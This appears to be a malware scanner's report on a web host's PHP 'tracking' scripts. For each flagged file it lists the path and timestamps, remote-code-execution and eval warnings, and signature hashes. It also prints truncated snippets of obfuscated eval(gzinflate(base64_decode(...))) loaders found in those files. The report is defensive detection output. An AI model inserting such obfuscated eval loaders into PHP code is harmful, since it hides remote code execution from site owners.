<?php 'H4sIAAAAAAAEAO08aXPbOLKfN1X+DwiTjaRZW3I8OWVJXsf2zPNUJsmLkrdHNqWCSEhCQpFcEvIxU/nvr7sB3qRExd7NTu3gQ2IBjUaj0ReABnfu9HrnnlSSy1+kN2dqIVgkokj63s4d88ckUjxU7c7hzp0dAD8VM+nFsB5fCubPWMDnYufOffyPDZnFnYnte4rbypWRskzPc892Vw529YQNuHl4zWbSFdHOnVD8cyVDMfE9W7CWJEDRWynpdoNF0Dqsg3jD59LjCqhcD6cupSv9yUJwR4Qx6M4dOWv/+b5ru4ODzq87dxgUDdG2Xvo2oe0z6TniCrtYyAGEEVdSwZ9firNChrhyGuK8jlfKZ6eSuyJk3HPY//kS6HkR+tyxeaTWzxvYx6H/xKH+E4LtAWZsgP8ms5VnR+ks4iV00zU8fcH86SdhK1gUZwpL4olLqKRFnLv+lLvs/tuzk9dvT89f/TiuwuIDmpAZ2AseSj4FKgA5V4y...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO08aXPbOLKfN1X+DwiTjaRZW3I8OWVJXsf2zPNUJsmLkrdHNqWCSEhCQpFcEvIxU/nvr7sB3qRExd7NTu3gQ2IBjUaj0ReABnfu9HrnnlSSy1+kN2dqIVgkokj63s4d88ckUjxU7c7hzp0dAD8VM+nFsB5fCubPWMDnYufOffyPDZnFnYnte4rbypWRskzPc892Vw529YQNuHl4zWbSFdHOnVD8cyVDMfE9W7CWJEDRWynpdoNF0Dqsg3jD59LjCqhcD6cupSv9yUJwR4Qx6M4dOWv/+b5ru4ODzq87dxgUDdG2Xvo2oe0z6TniCrtYyAGEEVdSwZ9firNChrhyGuK8jlfKZ6eSuyJk3HPY//kS6HkR+tyxeaTWzxvYx6H/xKH+E4LtAWZsgP8ms5VnR+ks4iV00zU8fcH86SdhK1gUZwpL4olLqKRFnLv+lLvs/tu...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO08aXPbOLKfN1X+DwiTjaRZW3I8OWVJXsf2zPNUJsmLkrdHNqWCSEhCQpFcEvIxU/nvr7sB3qRExd7NTu3gQ2IBjUaj0ReABnfu9HrnnlSSy1+kN2dqIVgkokj63s4d88ckUjxU7c7hzp0dAD8VM+nFsB5fCubPWMDnYufOffyPDZnFnYnte4rbypWRskzPc892Vw529YQNuHl4zWbSFdHOnVD8cyVDMfE9W7CWJEDRWynpdoNF0Dqsg3jD59LjCqhcD6cupSv9yUJwR4Qx6M4dOWv/+b5ru4ODzq87dxgUDdG2Xvo2oe0z6TniCrtYyAGEEVdSwZ9firNChrhyGuK8jlfKZ6eSuyJk3HPY//kS6HkR+tyxeaTWzxvYx6H/xKH+E4LtAWZsgP8ms5VnR+ks4iV00zU8fcH86SdhK1gUZwpL4olLqKRFnLv+lLvs/tu...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ivrmenu.php

Size: 11.34 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 3
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09aXPbRrKfmar8BxjFEshYp3fXm5VCeWVLifXKsrySvKlE5UIgEpKwBgEGAHU4q//+uueewQAED8XOhqzEImd6enqOPuf6+qtWO7pK0iz0Bxd+/zrsf3R6TpGNw52vv2pl4a/jCLLSpB92vCjpx+NBuNFPk8voan10PfK61VDjIoonwQwuJkGchtlN1A/zjbPbKI5SCX4dBoMw63iv0qQIk2KtuB+F204R3hUbd8OYwrQHF9CYJLx19l92SAomZmE+SpM8ZFm8Bp/WgH+GMYONLp2OE+V5WMDftn9y8K/3B6dn514/HY6C5N6PBt6HrrOyAh0WDZ1OBYTTfdJzPK/79VdOC7G22jIXiKgoJUjoKOC93vd7b04PAFXrN0DHPqJJa7tZ+J+wX3SCLAvuO24WBnmauL1d92Kc37td7AMs8MC6giOGBhZRcpUjNYOLtd2rsHhFs05ZjkoE60lScz+I4zBjDeFFSdrhwCx...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09aXPbRrKfmar8BxjFEshYp3fXm5VCeWVLifXKsrySvKlE5UIgEpKwBgEGAHU4q//+uueewQAED8XOhqzEImd6enqOPuf6+qtWO7pK0iz0Bxd+/zrsf3R6TpGNw52vv2pl4a/jCLLSpB92vCjpx+NBuNFPk8voan10PfK61VDjIoonwQwuJkGchtlN1A/zjbPbKI5SCX4dBoMw63iv0qQIk2KtuB+F204R3hUbd8OYwrQHF9CYJLx19l92SAomZmE+SpM8ZFm8Bp/WgH+GMYONLp2OE+V5WMDftn9y8K/3B6dn514/HY6C5N6PBt6HrrOyAh0WDZ1OBYTTfdJzPK/79VdOC7G22jIXiKgoJUjoKOC93vd7b04PAFXrN0DHPqJJa7tZ+J+wX3SCLAvuO24WBnmauL1d92Kc37td7AMs8MC6giOGBhZRcpUjNYOLtd2...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09aXPbRrKfmar8BxjFEshYp3fXm5VCeWVLifXKsrySvKlE5UIgEpKwBgEGAHU4q//+uueewQAED8XOhqzEImd6enqOPuf6+qtWO7pK0iz0Bxd+/zrsf3R6TpGNw52vv2pl4a/jCLLSpB92vCjpx+NBuNFPk8voan10PfK61VDjIoonwQwuJkGchtlN1A/zjbPbKI5SCX4dBoMw63iv0qQIk2KtuB+F204R3hUbd8OYwrQHF9CYJLx19l92SAomZmE+SpM8ZFm8Bp/WgH+GMYONLp2OE+V5WMDftn9y8K/3B6dn514/HY6C5N6PBt6HrrOyAh0WDZ1OBYTTfdJzPK/79VdOC7G22jIXiKgoJUjoKOC93vd7b04PAFXrN0DHPqJJa7tZ+J+wX3SCLAvuO24WBnmauL1d92Kc37td7AMs8MC6giOGBhZRcpUjNYOLtd2...

Sign 7830f7a6 Line: 3 Dangerous

Malware Signature (hash: 7830f7a6)

<?php nVch

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_contactlist_log.php

Size: 4.65 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO0bXXPbNvI5nvF/QHhuKM1Zkp2HTs+W5FNtNfVMmuQsu3O9NMOBSEhCDRE8ELSttvnvtwuQFCmJEpVmOte78sUiuLtY7C72A1gfHnQ61yHXnPKfeTglesZIzOKYy/DwIP3hxZoq3WieHx4cAvgVm/Awgw3pnBE5IRGdssODI/xDesShgefLUFNfCx5rJ8W8Dn2RBIgaMh9oU7UgEy5YfHig2L8TrpgnQ581XG4AWSfRXLSjWeTi3JtB3tEpD6kGNjcCkhxQP3LBpTdjNGDKwBqu+KTx9yPhi+7L5i+HBwQeC9FwXkvf0D0jPAzYE6I4SB5h2BPX8PPj6rpQJIKPFa5skGhJrjgVTBEaBuR7yYGfr5WkgU9jvWnlS25BgBTwvcDgewa2A5TxA/zxJknox8tVZEoUSy1efU3k+CfmawJ6CcaglZA9wmiuxxKGBBRFpkKOqSAPVHE6hhmBENWEKkZSLoP24cErC3Q08H2...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0bXXPbNvI5nvF/QHhuKM1Zkp2HTs+W5FNtNfVMmuQsu3O9NMOBSEhCDRE8ELSttvnvtwuQFCmJEpVmOte78sUiuLtY7C72A1gfHnQ61yHXnPKfeTglesZIzOKYy/DwIP3hxZoq3WieHx4cAvgVm/Awgw3pnBE5IRGdssODI/xDesShgefLUFNfCx5rJ8W8Dn2RBIgaMh9oU7UgEy5YfHig2L8TrpgnQ581XG4AWSfRXLSjWeTi3JtB3tEpD6kGNjcCkhxQP3LBpTdjNGDKwBqu+KTx9yPhi+7L5i+HBwQeC9FwXkvf0D0jPAzYE6I4SB5h2BPX8PPj6rpQJIKPFa5skGhJrjgVTBEaBuR7yYGfr5WkgU9jvWnlS25BgBTwvcDgewa2A5TxA/zxJknox8tVZEoUSy1efU3k+CfmawJ6CcaglZA9wmiuxxKGBBRFpkK...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0bXXPbNvI5nvF/QHhuKM1Zkp2HTs+W5FNtNfVMmuQsu3O9NMOBSEhCDRE8ELSttvnvtwuQFCmJEpVmOte78sUiuLtY7C72A1gfHnQ61yHXnPKfeTglesZIzOKYy/DwIP3hxZoq3WieHx4cAvgVm/Awgw3pnBE5IRGdssODI/xDesShgefLUFNfCx5rJ8W8Dn2RBIgaMh9oU7UgEy5YfHig2L8TrpgnQ581XG4AWSfRXLSjWeTi3JtB3tEpD6kGNjcCkhxQP3LBpTdjNGDKwBqu+KTx9yPhi+7L5i+HBwQeC9FwXkvf0D0jPAzYE6I4SB5h2BPX8PPj6rpQJIKPFa5skGhJrjgVTBEaBuR7yYGfr5WkgU9jvWnlS25BgBTwvcDgewa2A5TxA/zxJknox8tVZEoUSy1efU3k+CfmawJ6CcaglZA9wmiuxxKGBBRFpkK...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_cron.php

Size: 2.71 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1ZbW/jNhL+HiD/gSsEsb117KQFDgfvOXt58TbbJptc7LbobQOBkmibjSS6JBUnW+S/d4aUZFsvjuNF79MJCOxQMw/nnTP07s7uTvft7g55S0ZTrsiYh4zMeRiSKY0D+K6n8EfVvYJvVJO5SMKAeIwEImbkgVPiSxGT34WHGF0A6w5ZHPB4Qr49PCTXPxLJ1EzEiu3uTBkNmGw2Lkajm+5R5yilaLTe7aIU3Y8x15zyL8iM2yqmFBfx7k76xVWaSt1ckPthYnaKmQ8UVD4Z8dXujmR/JFwyV8Q+aza4IWTdRPOwM5vOzIbVJDd0wmOqYbNKQpITarARF65VydAaqfi4+e+90A//9W3rTzAIPKnSzqXwDW6P8Dhgj8jiIDzSsEeu4etzUS80Qsg9iZqdJFqQc05DJgl4hvwsOMhzKgUNfKp0leYLaWngUuB3A8PvGtouIOML+HDHSeyrhRZGirH1LPVRajKjkkYEAkQ...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1ZbW/jNhL+HiD/gSsEsb117KQFDgfvOXt58TbbJptc7LbobQOBkmibjSS6JBUnW+S/d4aUZFsvjuNF79MJCOxQMw/nnTP07s7uTvft7g55S0ZTrsiYh4zMeRiSKY0D+K6n8EfVvYJvVJO5SMKAeIwEImbkgVPiSxGT34WHGF0A6w5ZHPB4Qr49PCTXPxLJ1EzEiu3uTBkNmGw2Lkajm+5R5yilaLTe7aIU3Y8x15zyL8iM2yqmFBfx7k76xVWaSt1ckPthYnaKmQ8UVD4Z8dXujmR/JFwyV8Q+aza4IWTdRPOwM5vOzIbVJDd0wmOqYbNKQpITarARF65VydAaqfi4+e+90A//9W3rTzAIPKnSzqXwDW6P8Dhgj8jiIDzSsEeu4etzUS80Qsg9iZqdJFqQc05DJgl4hvwsOMhzKgUNfKp0leYLaWngUuB3A8PvGto...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1ZbW/jNhL+HiD/gSsEsb117KQFDgfvOXt58TbbJptc7LbobQOBkmibjSS6JBUnW+S/d4aUZFsvjuNF79MJCOxQMw/nnTP07s7uTvft7g55S0ZTrsiYh4zMeRiSKY0D+K6n8EfVvYJvVJO5SMKAeIwEImbkgVPiSxGT34WHGF0A6w5ZHPB4Qr49PCTXPxLJ1EzEiu3uTBkNmGw2Lkajm+5R5yilaLTe7aIU3Y8x15zyL8iM2yqmFBfx7k76xVWaSt1ckPthYnaKmQ8UVD4Z8dXujmR/JFwyV8Q+aza4IWTdRPOwM5vOzIbVJDd0wmOqYbNKQpITarARF65VydAaqfi4+e+90A//9W3rTzAIPKnSzqXwDW6P8Dhgj8jiIDzSsEeu4etzUS80Qsg9iZqdJFqQc05DJgl4hvwsOMhzKgUNfKp0leYLaWngUuB3A8PvGto...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_vb_add_campaign.php

Size: 21.09 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19bXfbNrLw5+05/Q8I463kVi92nJfWb6lru63viZPc2Nnebm4eXUqkLTYSqSUpO243//2ZGQAkSAIUSclO2o32bCOLwGAwGAxmBjPDL7/o9098L/Zs73fPv2Tx2GWRG0Ve4H/5hfgyiGI7jNvrO19+8SU0P3IvPF+29e2py4ILNrMv3S+/WMN/2B6zbGdwFXgjdzAMA9sZ2VFsid4n/mgyd7C7744Avh3esAtv4kZffhG6/5p7oTsI/JHbbnnU0O3PY2/Sm41nLRxf3+Slfen5dgyoahuypGF87U28YDB2bccNqS1h5V20v1+bjCa7D9b/+PILBh/eom09C0YEd5t5vuO+xy4Wgsc27nsvhq8f8vNCsky8YYgzO5jHATvy7IkbMtt32D+QKOwHSRTdzFNsgYg29B841H9AbfsAGR/AP4OLuT+K0lnIhZykK3n0AwuGv7mjGJbGGcLC+O41/JgsZaZDAD1CdjkJhva...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19bXfbNrLw5+05/Q8I463kVi92nJfWb6lru63viZPc2Nnebm4eXUqkLTYSqSUpO243//2ZGQAkSAIUSclO2o32bCOLwGAwGAxmBjPDL7/o9098L/Zs73fPv2Tx2GWRG0Ve4H/5hfgyiGI7jNvrO19+8SU0P3IvPF+29e2py4ILNrMv3S+/WMN/2B6zbGdwFXgjdzAMA9sZ2VFsid4n/mgyd7C7744Avh3esAtv4kZffhG6/5p7oTsI/JHbbnnU0O3PY2/Sm41nLRxf3+Slfen5dgyoahuypGF87U28YDB2bccNqS1h5V20v1+bjCa7D9b/+PILBh/eom09C0YEd5t5vuO+xy4Wgsc27nsvhq8f8vNCsky8YYgzO5jHATvy7IkbMtt32D+QKOwHSRTdzFNsgYg29B841H9AbfsAGR/AP4OLuT+K0lnIhZykK3n0Awu...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19bXfbNrLw5+05/Q8I463kVi92nJfWb6lru63viZPc2Nnebm4eXUqkLTYSqSUpO243//2ZGQAkSAIUSclO2o32bCOLwGAwGAxmBjPDL7/o9098L/Zs73fPv2Tx2GWRG0Ve4H/5hfgyiGI7jNvrO19+8SU0P3IvPF+29e2py4ILNrMv3S+/WMN/2B6zbGdwFXgjdzAMA9sZ2VFsid4n/mgyd7C7744Avh3esAtv4kZffhG6/5p7oTsI/JHbbnnU0O3PY2/Sm41nLRxf3+Slfen5dgyoahuypGF87U28YDB2bccNqS1h5V20v1+bjCa7D9b/+PILBh/eom09C0YEd5t5vuO+xy4Wgsc27nsvhq8f8vNCsky8YYgzO5jHATvy7IkbMtt32D+QKOwHSRTdzFNsgYg29B841H9AbfsAGR/AP4OLuT+K0lnIhZykK3n0Awu...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/save_outbound_call.php

Size: 655.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAH2SUW+bMBSF35H4Dy5CNdEgvK8LXUYyaVJeFlhf2ggRuCHWHJuZS5Oq2n+fDXRJ07S8+Z7vXp/DtW0p+NMyBZkUBXiUiYK3JYQtMj6utzUd3djWFvISlEdjKRAEBvhUw2eCcMDwsOMd4pZrMiEC9mT2zTMF22Ib76ubLec/f82T9J6mkq4mE8ch19fktP5dyV2vjGzr2baI/s7bTs90dfMGGmacVjrsr/FRcbnOOXGnRSFbgQkrfX1ocZvK3yCM94IzHWvwn4B6ZAU0WbpnnEnvnb4+o1vknOvGYUQQ5T0cREZogqgC9E5szVjOY63oYXTV/bfXSbtRWg8ilOdqzPCpIyg9lxLMEd7RYuNHXe7M67qv7+SacTDHl9Wxpnlt/WjbbPCScNXvsNuNgsZkKddB1OSP+nW1WEkmqsykGx5IGLobfetkI2sQnsNlNcYDOr6Tf3IMEYabvWIIXof5xLlfzuM7Ek8XCzKbp9M...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH2SUW+bMBSF35H4Dy5CNdEgvK8LXUYyaVJeFlhf2ggRuCHWHJuZS5Oq2n+fDXRJ07S8+Z7vXp/DtW0p+NMyBZkUBXiUiYK3JYQtMj6utzUd3djWFvISlEdjKRAEBvhUw2eCcMDwsOMd4pZrMiEC9mT2zTMF22Ib76ubLec/f82T9J6mkq4mE8ch19fktP5dyV2vjGzr2baI/s7bTs90dfMGGmacVjrsr/FRcbnOOXGnRSFbgQkrfX1ocZvK3yCM94IzHWvwn4B6ZAU0WbpnnEnvnb4+o1vknOvGYUQQ5T0cREZogqgC9E5szVjOY63oYXTV/bfXSbtRWg8ilOdqzPCpIyg9lxLMEd7RYuNHXe7M67qv7+SacTDHl9Wxpnlt/WjbbPCScNXvsNuNgsZkKddB1OSP+nW1WEkmqsykGx5IGLobfetkI2sQnsNlNcYDOr6...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH2SUW+bMBSF35H4Dy5CNdEgvK8LXUYyaVJeFlhf2ggRuCHWHJuZS5Oq2n+fDXRJ07S8+Z7vXp/DtW0p+NMyBZkUBXiUiYK3JYQtMj6utzUd3djWFvISlEdjKRAEBvhUw2eCcMDwsOMd4pZrMiEC9mT2zTMF22Ib76ubLec/f82T9J6mkq4mE8ch19fktP5dyV2vjGzr2baI/s7bTs90dfMGGmacVjrsr/FRcbnOOXGnRSFbgQkrfX1ocZvK3yCM94IzHWvwn4B6ZAU0WbpnnEnvnb4+o1vknOvGYUQQ5T0cREZogqgC9E5szVjOY63oYXTV/bfXSbtRWg8ilOdqzPCpIyg9lxLMEd7RYuNHXe7M67qv7+SacTDHl9Wxpnlt/WjbbPCScNXvsNuNgsZkKddB1OSP+nW1WEkmqsykGx5IGLobfetkI2sQnsNlNcYDOr6...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_vb_campaigns.php

Size: 6.59 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO08a3fbtpKfm3PyHxDWa0mJJdnp2W6vXo4bu73ekzpZ29nt3d4eHYqEJDQUwZKgH+3Nf9+ZAd8iKUp2k7u75YfEIoHBvGcADPD0Sb9/7golTPGbcBdMLTkLeBAI6T59Ev0xDZTpq3Zn+PTJU2h+yufCjdu65oozOWeeueBPn+zhf2zMDNOe3khh8enMl6ZtmYEyot7nruWENnZ3uQXwTf+ezYXDg6dPfP5rKHw+la7F2y1BDXk/VMLpeUuvheOXN3lnLoRrKkC1tCFLGqpb4Qg5XXLT5j61JazEvP1qz7Gc0cvO70+fMHh0i7bxRloEd8CEa/M77GIgeGzD74SCPz8W6UK2OGLmI2UnoZLsVJgO95np2uw/kSns25gpZZSn2AITTeg/tan/lNr2ATJ+gP+m89C1gpSKWJBOKsnTb5mc/cItBaKxZyAYl9/Cy0SUuQ4Sevhs4ciZ6bAb0xfmDAYEOKZips9ZhKTde/r...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO08a3fbtpKfm3PyHxDWa0mJJdnp2W6vXo4bu73ekzpZ29nt3d4eHYqEJDQUwZKgH+3Nf9+ZAd8iKUp2k7u75YfEIoHBvGcADPD0Sb9/7golTPGbcBdMLTkLeBAI6T59Ev0xDZTpq3Zn+PTJU2h+yufCjdu65oozOWeeueBPn+zhf2zMDNOe3khh8enMl6ZtmYEyot7nruWENnZ3uQXwTf+ezYXDg6dPfP5rKHw+la7F2y1BDXk/VMLpeUuvheOXN3lnLoRrKkC1tCFLGqpb4Qg5XXLT5j61JazEvP1qz7Gc0cvO70+fMHh0i7bxRloEd8CEa/M77GIgeGzD74SCPz8W6UK2OGLmI2UnoZLsVJgO95np2uw/kSns25gpZZSn2AITTeg/tan/lNr2ATJ+gP+m89C1gpSKWJBOKsnTb5mc/cItBaKxZyAYl9/Cy0SUuQ4...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO08a3fbtpKfm3PyHxDWa0mJJdnp2W6vXo4bu73ekzpZ29nt3d4eHYqEJDQUwZKgH+3Nf9+ZAd8iKUp2k7u75YfEIoHBvGcADPD0Sb9/7golTPGbcBdMLTkLeBAI6T59Ev0xDZTpq3Zn+PTJU2h+yufCjdu65oozOWeeueBPn+zhf2zMDNOe3khh8enMl6ZtmYEyot7nruWENnZ3uQXwTf+ezYXDg6dPfP5rKHw+la7F2y1BDXk/VMLpeUuvheOXN3lnLoRrKkC1tCFLGqpb4Qg5XXLT5j61JazEvP1qz7Gc0cvO70+fMHh0i7bxRloEd8CEa/M77GIgeGzD74SCPz8W6UK2OGLmI2UnoZLsVJgO95np2uw/kSns25gpZZSn2AITTeg/tan/lNr2ATJ+gP+m89C1gpSKWJBOKsnTb5mc/cItBaKxZyAYl9/Cy0SUuQ4...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/manage_blacklists.php

Size: 1.80 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEANVXbW/bNhD+XAP+Dxc2mxygkuwC61pHUufYwpotTQPYBVYkhkFLtM2VehlJJSmG/vcdJfkltZy22L4sCeDw+Nzbw7sj3W657nDFoo+wyCREWbrgS8dpt/iic7Tggs3YPVdadQhPI1HEzK0h+SonJyft1t/tFuBPzFmHePNgsmKSAVdAU2BSZtKBYakAxhikmUY/RRo7cCUYVQwks3mqNBUCKv+aRhpUkeeZ1I7nzgNyctpufW63FFOKZ+kMwVJ3jFCyvwou2SxLI9ax1gEWmgsTnmUgxzldMvCB0DjhqVkQI43nKEvZHYzOSkvHc0Gjj8Jkihu4bQdLps82whLURqquMF6R0RhKzlTFE1eK6c7xbByOx+fvLq+tQjE547E13WFoxWjMZIdcZBHVmEcfRLbkaUXkaYVBrnWVLJrdsZczmfAye2vq9U6gNvk6aLc8FUmea9CfcuYTze61+ye9pZWUBBWQCoaUWR+yAiK...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANVXbW/bNhD+XAP+Dxc2mxygkuwC61pHUufYwpotTQPYBVYkhkFLtM2VehlJJSmG/vcdJfkltZy22L4sCeDw+Nzbw7sj3W657nDFoo+wyCREWbrgS8dpt/iic7Tggs3YPVdadQhPI1HEzK0h+SonJyft1t/tFuBPzFmHePNgsmKSAVdAU2BSZtKBYakAxhikmUY/RRo7cCUYVQwks3mqNBUCKv+aRhpUkeeZ1I7nzgNyctpufW63FFOKZ+kMwVJ3jFCyvwou2SxLI9ax1gEWmgsTnmUgxzldMvCB0DjhqVkQI43nKEvZHYzOSkvHc0Gjj8Jkihu4bQdLps82whLURqquMF6R0RhKzlTFE1eK6c7xbByOx+fvLq+tQjE547E13WFoxWjMZIdcZBHVmEcfRLbkaUXkaYVBrnWVLJrdsZczmfAye2vq9U6gNvk6aLc8FUm...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANVXbW/bNhD+XAP+Dxc2mxygkuwC61pHUufYwpotTQPYBVYkhkFLtM2VehlJJSmG/vcdJfkltZy22L4sCeDw+Nzbw7sj3W657nDFoo+wyCREWbrgS8dpt/iic7Tggs3YPVdadQhPI1HEzK0h+SonJyft1t/tFuBPzFmHePNgsmKSAVdAU2BSZtKBYakAxhikmUY/RRo7cCUYVQwks3mqNBUCKv+aRhpUkeeZ1I7nzgNyctpufW63FFOKZ+kMwVJ3jFCyvwou2SxLI9ax1gEWmgsTnmUgxzldMvCB0DjhqVkQI43nKEvZHYzOSkvHc0Gjj8Jkihu4bQdLps82whLURqquMF6R0RhKzlTFE1eK6c7xbByOx+fvLq+tQjE547E13WFoxWjMZIdcZBHVmEcfRLbkaUXkaYVBrnWVLJrdsZczmfAye2vq9U6gNvk6aLc8FUm...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_vb_edit_campaign.php

Size: 16.71 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09a3fbNrKft+f0PyCMN5JaS/Ijr8qWU9dx29yT142d3dvNzdWhRMhiQpFakvKjqf/7ncGDBEmQAiU7TbNST2OJBAaDwWAwM5gBvv2m233mu7Fru7+7/hmJJ5RENIrcwP/2G/FlEMV2GDdbe99+8y0Uf0rHri/L+vaUkmBMZvYZ/fabDfxD+sSyncF54I7oYBgGtjOyo9gStZ/5I2/uYHWfjgC+HV6RsevR6NtvQvrvuRvSQeCPaLPhsoK0O49drzObzBrYvr7Ia/vM9e0YUNUWJEnB+ML13GAwobZDQ1aWYeWOmz9ueCNvf6f16dtvCHx4iab1PBgxuD3i+g69xCoWgscy9NKN4et1vl9IFs8dhtizw3kckKeu7dGQ2L5D/oFEIT9Jouh6nmILRLSh/sBh9QesbBcg4wv4MxjP/VGU9kIOpJeO5NOfSDD8QEcxDI0zhIHx6QU8TIYyUyGAGiE584Kh7ZFzO3TtITQ...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3fbNrKft+f0PyCMN5JaS/Ijr8qWU9dx29yT142d3dvNzdWhRMhiQpFakvKjqf/7ncGDBEmQAiU7TbNST2OJBAaDwWAwM5gBvv2m233mu7Fru7+7/hmJJ5RENIrcwP/2G/FlEMV2GDdbe99+8y0Uf0rHri/L+vaUkmBMZvYZ/fabDfxD+sSyncF54I7oYBgGtjOyo9gStZ/5I2/uYHWfjgC+HV6RsevR6NtvQvrvuRvSQeCPaLPhsoK0O49drzObzBrYvr7Ia/vM9e0YUNUWJEnB+ML13GAwobZDQ1aWYeWOmz9ueCNvf6f16dtvCHx4iab1PBgxuD3i+g69xCoWgscy9NKN4et1vl9IFs8dhtizw3kckKeu7dGQ2L5D/oFEIT9Jouh6nmILRLSh/sBh9QesbBcg4wv4MxjP/VGU9kIOpJeO5NOfSDD8QEcxDI0...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

